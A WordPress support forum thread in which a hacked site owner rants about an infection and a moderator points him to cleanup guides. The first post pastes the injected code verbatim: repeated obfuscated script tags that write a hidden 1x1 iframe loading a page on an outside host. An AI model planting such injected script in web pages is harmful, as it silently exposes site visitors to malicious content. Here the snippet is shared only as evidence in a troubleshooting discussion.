Forums

WordPress › Support » How-To and Troubleshooting

Get your security holes fixed, damn it! (4 posts)

  1. spencerp
    Member
    Posted 2 years ago #

    I was running a site with wordpress only, on one domain. Everything was fine until a day ago... This was in my index.php file. Not to mention other javascript shit within other files.

    <script>var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%66%6f%70%73%6c%2e%63%6e%2f%66%6f%72%75%6d%2f%69%6e%64%65%78%2e%70%68%70%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');document.write(fr);</script><script>var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%66%6f%70%73%6c%2e%63%6e%2f%66%6f%72%75%6d%2f%69%6e%64%65%78%2e%70%68%70%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');document.write(fr);</script><script>var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%66%6f%70%73%6c%2e%63%6e%2f%66%6f%72%75%6d%2f%69%6e%64%65%78%2e%70%68%70%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');document.write(fr);</script><script>var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%66%6f%70%73%6c%2e%63%6e%2f%66%6f%72%75%6d%2f%69%6e%64%65%78%2e%70%68%70%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');document.write(fr);</script><script>var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%66%6f%70%73%6c%2e%63%6e%2f%66%6f%72%75%6d%2f%69%6e%64%65%78%2e%70%68%70%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');document.write(fr);</script><script>var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%66%6f%70%73%6c%2e%63%6e%2f%66%6f%72%75%6d%2f%69%6e%64%65%78%2e%70%68%70%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');document.write(fr);</script><script>var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%66%6f%70%73%6c%2e%63%6e%2f%66%6f%72%75%6d%2f%69%6e%64%65%78%2e%70%68%70%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');document.write(fr);</script><script>var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%66%6f%70%73%6c%2e%63%6e%2f%66%6f%72%75%6d%2f%69%6e%64%65%78%2e%70%68%70%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');document.write(fr);</script><script>var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%66%6f%70%73%6c%2e%63%6e%2f%66%6f%72%75%6d%2f%69%6e%64%65%78%2e%70%68%70%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');document.write(fr);</script>

    Not to mention other files and [moronic expletive deleted]... and I didn't do anything to get this crap. FIX THE HOLES!! I ran WordPress on another location, different domain, but my other domain was infected because I ran WordPress on another domain. The domain that's blacklisted is "spencerpassmore.com" and I didn't have WordPress on it, I only had images on it, for a portfolio.

    No software. The only software I had on that hosting account, was WordPress, and it was on a different domain name. And if overflowed into my other domains. Which didn't have WordPress on at all. I had a whole separate domain name, that ran WordPress. Nothing at all, but WordPress. I couldn't access my own control panel from the host "CPANEL", because it was infested with [moronic expletive deleted].

    Get your holes fixed, soon. I'm old school member here, I used to be moderator here, and this is just plain [moronic expletive deleted]. Get something done today! I'm half afraid to run WP anymore, and I'm about to tell others NOT to run it. There's obvious security hole leaks. If there wasn't, this [moronic expletive deleted] wouldn't be happening.

    Edit: I know, I know, change the password... I did. I will again. Still shouldn't be a habit though. Damn software.

  2. Samuel B
    moderator
    Posted 2 years ago #

    I'm old school member here, I used to be moderator here, and this is just plain [moronic expletive deleted]. Get something done today! I'm half afraid to run WP anymore, and I'm about to tell others NOT to run it. There's obvious security hole leaks. If there wasn't, this [moronic expletive deleted] wouldn't be happening.

    get a grip - you of all people should know it's not wordpress 2.8.4 and above. If you were hacked from wordpress, it's from an older install

    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

    http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/

  3. spencerp
    Member
    Posted 2 years ago #

    Thanks Sam for the links, but it was a 2.8.4 or above version. I haven't ran an earlier version of WordPress in years. I always ran the latest copies. ;) But I've been looking more into this issue though... This has been happening with blank index.php files on domains that don't even have any software on them. I'll still use WordPress of course, just that night I was pissed off and drinking... the two don't mix at all. :p Thanks again for those links...

  4. whooami
    Member
    Posted 2 years ago #

    tard :P (JUST kidding!!) what up homie

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.